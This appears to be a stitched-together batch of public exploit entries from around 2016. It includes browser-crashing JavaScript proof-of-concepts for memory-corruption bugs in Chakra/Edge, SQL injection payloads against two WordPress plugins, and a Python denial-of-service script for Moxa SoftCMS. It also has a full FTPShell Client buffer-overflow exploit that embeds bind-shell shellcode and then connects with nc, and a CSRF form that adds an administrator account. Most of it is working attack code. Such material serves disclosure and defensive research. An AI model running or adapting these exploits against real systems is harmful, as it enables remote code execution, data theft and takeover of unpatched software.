nextLeft can be smaller than the segment length if next is null and left is very large, leading size to be set to a small value which is less than the segment length. Many other methods, including setting an element of an array assume that size is less than length, and often allocate size bytes then copy length bytes, leading to an overflow if length is actually more than size.
A minimal PoC is as follows:
var a = [1];
a.length = 1000;
var j = [];
var o = {};
Object.defineProperty(o, '1', {
get: function() {
a.length = 1002;
j.fill.call(a, 7.7);
return 2;
}
});
a.__proto__ = o;
var r = j.reverse.call(a);
r.length = 0xfffffffe;
r[0xfffffffe - 1] = 10;
A full PoC is attached. Note that this PoC sometimes needs to be refreshed a few times to cause a crash.
-->
<html>
<head><meta http-equiv="refresh" content="1">
</head>
<body>
<script>
var a = [1];
a.length = 1000;
var j = [];
var o = {};
Object.defineProperty(o, '1', {
get: function() {
//alert('get!');
a.length = 1002;
j.fill.call(a, 7.7);
return 2;
}
});
a.__proto__ = o;
var place = [];
for(var i = 0; i < 10; i++){
var r = j.reverse.call(a);
r.length = 0xfffffffe;
r[0xfffffffe - 1] = 10;
var q = [1,2,3,4,5,6,7,8,9,10];
place.push(q);
}
//alert(place.join());
</script>
</body>
</html>
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=922
There is an info leak in Array.filter. In Chakra, the destination array that arrays are filtered into is initialized using ArraySpeciesCreate, which can create both native and variable arrays. However, the loop that calls the filter function assumes that the destination array is a variable array, and sets each value using DirectSetItemAt, which is unsafe, and can lead to a var pointer being written to an integer array. A PoC is as follows and attached:
var b = new Array(1,2,3);
var d = new Array(1,2,3);
class dummy{
constructor(){
return d;
}
}
class MyArray extends Array {
static get [Symbol.species]() {
return dummy;
}
}
var a = new Array({}, [], "natalie", 7, 7, 7, 7, 7);
function test(i){
return true;
}
a.__proto__ = MyArray.prototype;
var o = a.filter(test);
var h = [];
for(item in o){
var n = new Number(o[item]);
if (n < 0){
n = n + 0x100000000;
}
h.push(n.toString(16));
}
alert(h);
<html><body><script>
var b = new Array(1,2,3);
var d = new Array(1,2,3);
class dummy{
constructor(){
alert("in constructor");
return d;
}
}
class MyArray extends Array {
// Overwrite species to the parent Array constructor
static get [Symbol.species]() {
alert("get");
b[0] = {};
return dummy; }
}
var a = new Array({}, [], "natalie", 7, 7, 7, 7, 7);
function test(i){
return true;
}
a.__proto__ = MyArray.prototype;
var o = a.filter(test);
alert(o);
var h = [];
for(item in o){
var n = new Number(o[item]);
if (n < 0){
n = n + 0x100000000;
}
h.push(n.toString(16));
}
alert(h);
</script></body></html>
https://bugs.chromium.org/p/project-zero/issues/detail?id=922#c1
I looked a bit more into this issue, and I think it can actually be used to corrupt the heap too. The issue is that DirectSetItemAt is called on an int array when it thinks it's a Var array. But since elements of a Var array are twice as wide as elements of the int array, setting items at indexes larger than half the array length will write outside of the allocated array. I've attached a sample that crashes Edge and demonstrates the overflow.
-->
<html>
<body>
<script>
var b = new Array(1,2,3);
var d = new Array(1,2,3);
d.length = 0x200000;
d.fill(7);
class dummy{
constructor(){
alert("in constructor");
return d;
}
}
class MyArray extends Array {
// Overwrite species to the parent Array constructor
static get [Symbol.species]() {
alert("get");
b[0] = {};
return dummy; }
}
var a = new Array({}, [], "natalie", 7, 7, 7, 7, 7);
for(var i = 0; i < 0x200000; i++){
a[i] = i;
}
function test(i){
return true;
}
a.__proto__ = MyArray.prototype;
var o = a.filter(test);
alert(o);
var h = [];
for(item in o){
var n = new Number(o[item]);
if (n < 0){
n = n + 0x100000000;
}
h.push(n.toString(16));
}
alert(h);
</script>
</body>
</html>
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=945
JavascriptArray::FillFromPrototypes is a method that is used by several Javascript functions available in the browser to set the native elements of an array to the values provide by its prototype. This function calls JavascriptArray::ForEachOwnMissingArrayIndexOfObject with the prototype of the object as a parameter, and if the prototype of the object is an array, it assumes that it is a Var array. While arrays are generally converted to var arrays if they are set as an object's prototype, if an object's prototype is a Proxy object, it can return a parent prototype that is a native int array. This can lead to type confusing, allowing an integer to be treated as an absolute pointer, when JavascriptArray::FillFromPrototypes is called. A minimal PoC is as follows, and a full PoC is attached.
var a = new Array(0x11111111, 0x22222222, 0x33333333, 0x44444444, 0x12121212, 0x23232323, 0x12345670, 0x7777);
var handler = {
getPrototypeOf: function(target, name){
return a;
}
};
var p = new Proxy([], handler);
var b = [{}, [], "natalie"];
b.__proto__ = p;
b.length = 4;
a.shift.call(b);
// b[2] is type confused
-->
<html>
<body>
<script>
var a = new Array(0x11111111, 0x22222222, 0x33333333, 0x44444444, 0x12121212, 0x23232323, 0x12345670, 0x7777);
var handler = {
getPrototypeOf: function(target, name){
// print("get proto");
return a;
}
};
var p = new Proxy([], handler);
var b = [{}, [], "natalie"];
b.__proto__ = p;
b.length = 4;
a.shift.call(b);
print(a.shift.call(b[2]));
</script>
</body>
</html>
# Exploit Title: Product Catalog 8 1.2 Plugin WordPress – Sql Injection
# Date: 12/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/product-catalog-8/
# Software Link: https://wordpress.org/plugins/product-catalog-8/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.2
# Tested on: Windows 8.1
1 - Description:
$_POST[ ‘selectedCategory’ ] is not escaped.
UpdateCategoryList() is accessible for any user.
http://lenonleite.com.br/en/blog/2016/11/18/product-catalog-8-plugin-wordpress-sql-injection/
2 - Proof of Concept:
<form method="post" action="http://target/wp-admin/admin-ajax.php">
<input type="text" name="selectedCategory" value="0 UNION SELECT 1,2,3,4,5,6 FROM wp_terms WHERE term_id=1">
<input type="text" name="action" value="UpdateCategoryList">
<input type="submit" value="Send">
</form>
3 - Timeline:
12/11/2016 - Discovered
12/11/2016 - vendor not found
--
Atenciosamente
Lenon Leite
# Exploit Title: BBS e-Franchise 1.1.1 Plugin of WordPress – Sql Injection
# Date: 12/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/bbs-e-franchise/
# Software Link: https://wordpress.org/plugins/bbs-e-franchise/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.1.1
# Tested on: Windows 8.1
1 - Description:
$_GET[‘uid’] is not escaped. Url is accessible for any user.
I will have find post or page that usage plugin, that use shortcode
http://lenonleite.com.br/en/blog/2016/11/18/bbs-e-franchise-1-1-1-plugin-of-wordpress-sql-injection/
2 - Proof of Concept:
http://target/2016/09/26/ola-mundo-2/?uid=0+UNION+SELECT+1,2,3,4,name,6,7,8,9,10,11,12,13,14,15,slug,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+wp_terms+WHERE+term_id=1
3 - Timeline:
12/11/2016 - Discovered
12/11/2016 - vendor not found
'''
# Title: Moxa SoftCMS 1.5 AspWebServer Denial of Service Vulnerability
# Author: Zhou Yu
# Email: 504137480@qq.com
# Vendor: http://www.moxa.com/
# Versions affected: 1.5 or prior versions
# Test on: Moxa SoftCMS 1.5 on Windows 7 SP1 x32
# CVE: CVE-2016-9332
# Advisory: https://ics-cert.us-cert.gov/advisories/ICSA-16-322-02
Vulnerability Description:
AspWebServer does not properly validate input. An attacker could provide unexpected values and cause the program to crash or excessive consumption of resources could result in a denial-of-service condition.
Vulnerability Discovery Method:
With the help of kitty fuzzing framework, we are able to find some vulnerabilities of the AspWebServer when parsing HTTP GET request. Details of the fuzzer scripts and output can be found here: https://github.com/dazhouzhou/ICS-Vulnerabilities/tree/master/Moxa/SoftCMS .
'''
import socket
host = '192.168.124.128'
port = 81
# extracted four payloads from crashes that can crash the AspWebServer.exe
payload1 = 'GET /\ HTTP/1.1\r\n\r\n'
payload2 = 'GET \x00 HTTP/1.1\r\n\r\n'
payload3 = 'GET \n HTTP/1.1\r\n\r\n'
payload4 = 'GET /. HTTP/1.1\r\n\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(payload1)
s.close()
# -*- coding: utf-8 -*-
# Exploit Title: FTPShell Client v5.24 PWD Remote Buffer Overflow
# Date: 16/11/2016
# Author: Yunus YILDIRIM (Th3GundY)
# Team: CT-Zer0 (@CRYPTTECH) - http://www.ct-zer0.com
# Author Website: http://yildirimyunus.com
# Contact: yunusyildirim@protonmail.com
# Software Link: http://www.ftpshell.com/downloadclient.htm
# Tested on: Windows XP Professional SP 2
# Tested on: Windows 7 Ultimate 32bit, Home Premium 64bit
import socket
import sys
import os
import time
def banner():
banner = "\n\n"
banner += " ██████╗████████╗ ███████╗███████╗██████╗ ██████╗ \n"
banner += " ██╔════╝╚══██╔══╝ ╚══███╔╝██╔════╝██╔══██╗██╔═████╗ \n"
banner += " ██║ ██║█████╗ ███╔╝ █████╗ ██████╔╝██║██╔██║ \n"
banner += " ██║ ██║╚════╝███╔╝ ██╔══╝ ██╔══██╗████╔╝██║ \n"
banner += " ╚██████╗ ██║ ███████╗███████╗██║ ██║╚██████╔╝ \n"
banner += " ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═════╝ \n"
banner += " \n"
print banner
def usage():
banner()
print "[-] Missing arguments\n"
print "[*] Usage: python FTPShell-exploit.py target_os"
print "[*] Target types:\n\tWindows XP -> winxp\n\tWindows 7-32bit -> win7_32\n\tWindows 7-64bit -> win7_64\n"
sys.exit(0)
def exploit(target_eip):
s0ck3t = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s0ck3t.bind(("0.0.0.0", 21))
s0ck3t.listen(5)
print "[*] CT-Zer0 Evil FTP Server Listening port 21\n"
# \x00\x0a\x0d\x22\xff
# msfvenom -p windows/shell_bind_tcp LPORT=5656 -f c -b '\x00\x0a\x0d\x22\xff'
shellcode = ("\xbb\x61\xad\x84\xdf\xda\xcc\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x53\x31\x5a\x12\x83\xc2\x04\x03\x3b\xa3\x66\x2a\x47\x53\xe4"
"\xd5\xb7\xa4\x89\x5c\x52\x95\x89\x3b\x17\x86\x39\x4f\x75\x2b"
"\xb1\x1d\x6d\xb8\xb7\x89\x82\x09\x7d\xec\xad\x8a\x2e\xcc\xac"
"\x08\x2d\x01\x0e\x30\xfe\x54\x4f\x75\xe3\x95\x1d\x2e\x6f\x0b"
"\xb1\x5b\x25\x90\x3a\x17\xab\x90\xdf\xe0\xca\xb1\x4e\x7a\x95"
"\x11\x71\xaf\xad\x1b\x69\xac\x88\xd2\x02\x06\x66\xe5\xc2\x56"
"\x87\x4a\x2b\x57\x7a\x92\x6c\x50\x65\xe1\x84\xa2\x18\xf2\x53"
"\xd8\xc6\x77\x47\x7a\x8c\x20\xa3\x7a\x41\xb6\x20\x70\x2e\xbc"
"\x6e\x95\xb1\x11\x05\xa1\x3a\x94\xc9\x23\x78\xb3\xcd\x68\xda"
"\xda\x54\xd5\x8d\xe3\x86\xb6\x72\x46\xcd\x5b\x66\xfb\x8c\x33"
"\x4b\x36\x2e\xc4\xc3\x41\x5d\xf6\x4c\xfa\xc9\xba\x05\x24\x0e"
"\xbc\x3f\x90\x80\x43\xc0\xe1\x89\x87\x94\xb1\xa1\x2e\x95\x59"
"\x31\xce\x40\xf7\x39\x69\x3b\xea\xc4\xc9\xeb\xaa\x66\xa2\xe1"
"\x24\x59\xd2\x09\xef\xf2\x7b\xf4\x10\xea\x63\x71\xf6\x78\x84"
"\xd7\xa0\x14\x66\x0c\x79\x83\x99\x66\xd1\x23\xd1\x60\xe6\x4c"
"\xe2\xa6\x40\xda\x69\xa5\x54\xfb\x6d\xe0\xfc\x6c\xf9\x7e\x6d"
"\xdf\x9b\x7f\xa4\xb7\x38\xed\x23\x47\x36\x0e\xfc\x10\x1f\xe0"
"\xf5\xf4\x8d\x5b\xac\xea\x4f\x3d\x97\xae\x8b\xfe\x16\x2f\x59"
"\xba\x3c\x3f\xa7\x43\x79\x6b\x77\x12\xd7\xc5\x31\xcc\x99\xbf"
"\xeb\xa3\x73\x57\x6d\x88\x43\x21\x72\xc5\x35\xcd\xc3\xb0\x03"
"\xf2\xec\x54\x84\x8b\x10\xc5\x6b\x46\x91\xf5\x21\xca\xb0\x9d"
"\xef\x9f\x80\xc3\x0f\x4a\xc6\xfd\x93\x7e\xb7\xf9\x8c\x0b\xb2"
"\x46\x0b\xe0\xce\xd7\xfe\x06\x7c\xd7\x2a")
buffer = "A" * 400 + target_eip + "\x90" * 40 + shellcode
while True:
victim, addr = s0ck3t.accept()
victim.send("220 CT-Zer0 Evil FTP Service\r\n")
print "[*] Connection accepted from %s\n" % addr[0]
while True:
data = victim.recv(1024)
if "USER" in data:
victim.send("331 User name okay, need password\r\n\r\n")
print "\t[+] 331 USER = %s" % data.split(" ")[1],
elif "PASS" in data:
victim.send("230 Password accepted.\r\n230 User logged in.\r\n")
print "\t[+] 230 PASS = %s" % data.split(" ")[1],
elif "PWD" in data:
victim.send('257 "' + buffer + '" is current directory\r\n')
print "\t[+] 257 PWD"
print "\n[*] Exploit Sent Successfully\n"
time.sleep(2)
print '[+] You got bind shell on port 5656\n'
os.system('nc ' + str(addr[0]) + ' 5656')
if len(sys.argv) != 2:
usage()
else:
banner()
try:
if sys.argv[1] == "winxp":
# 7C80C75B JMP EBP kernel32.dll
target_eip = "\x5B\xC7\x80\x7C"
elif sys.argv[1] == "win7_32":
# 76ad0299 jmp ebp [kernel32.dll]
target_eip = "\x99\x02\xAD\x76"
elif sys.argv[1] == "win7_64":
# 7619dfce jmp ebp [kernel32.dll]
target_eip = "\xCE\xDF\x19\x76"
else:
usage()
exploit(target_eip)
except:
print "\n[O_o] KTHXBYE! [O_o]"
Document Title:
===============
EditMe CMS - CSRF Privilege Escalate Web Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1996
Release Date:
=============
2016-11-14
Vulnerability Laboratory ID (VL-ID):
====================================
1996
Common Vulnerability Scoring System:
====================================
2.8
Product & Service Introduction:
===============================
EditMe is a framework that serves as a Platform as a Service to build custom Web Applications, Web Prototyping,and Web CMS.
CMS in which any page can be a server side script that implements whatever dynamic functionality you dream up. That's EditMe. No FTP servers, compilers or IDEs required. EditMe's API uses server-side JavaScript and our templates use XML, so there are no new languages to lear.
(Copy of the Vendor Homepage: http://www.editme.com/ )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a csrf privilege escalate web vulnerability in the official EditMe content managament system.
Vulnerability Disclosure Timeline:
==================================
2016-11-14: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A cross site request forgery vulnerability has been discovered in the official EditMe content managament system.
The vulnerability allows to perform malicious client-side web-application requests to execute non-protected functions
with own web context.
In the absence of security token, an attacker could execute arbitrary code in the administrators browser to gain
unauthorized access to the administrator access privileges.
Proof of Concept (PoC):
=======================
Cross site request forgery web vulnerability can be exploited by malicious web application without privileged user account and without user interaction.
To demonstrate safety or reproduce csrf web vulnerability information and follow the steps below to continue provided.
--- PoC: CSRF Exploitation ---
<html>
<h2>Privilege Escalate CSRF Vulnerability</h2>
<form action="http://localhost/_Register" method="post">
<input name="mode" value="AdminAdd" type="hidden">
<input name="redirect" value="" type="hidden">
<td><select name="user-groupname">
<option value="A"selected="">Administrator</option></select></td>
<input name="user-username" value="VulnerabilityLab" type="hidden">
<input name="user-password" value="1234" type="hidden">
<input name="user-password2" value="1234" type="hidden">
<input name="user-email" value="tested@live.fr"type="hidden">
<input class="button" style="font-size:110%" name="regSubmit" value="Save" type="submit">
</form>
</html>
--- PoC Session Logs [POST]---
Status: 200 [OK]
Host: pentest.editme.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: __utma=164978144.641387690.1478254033.1478262268.1478328738.3; __utmz=164978144.1478328738.3.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); km_lv=x; km_ai=i3E6P9IiO690CMxX353C5RCJAVY%3D; km_uq=; __utma=1.330307796.1478254213.1478254213.1478329355.2; __utmz=1.1478254213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=164978144.3.10.1478328738; __utmc=164978144; JSESSIONID=377D65CA3361D7998A1173C97420C846; visited=" Home 404"; __utmb=1.24.10.1478329355; __utmc=1; __utmt=1; editme-user=admin; editme-key="ECiu7PBk57GYeaLPUxHeDw=="
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
-
POST Method: mode=AdminAdd&redirect=&user-groupname=A&user-username=VulnerabilityLab&user-password=1234&user-password2=1234&user-email=tested%40live.fr®Submit=Save
Security Risk:
==============
The security rsik of the client-side cross site request forgery web vulnerability in the application is estimated as medium. (CVSS 2.8)
Credits & Authors:
==================
ZwX - (http://zwx.fr/) )[http://www.vulnerability-lab.com/show.php?user=ZwX]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com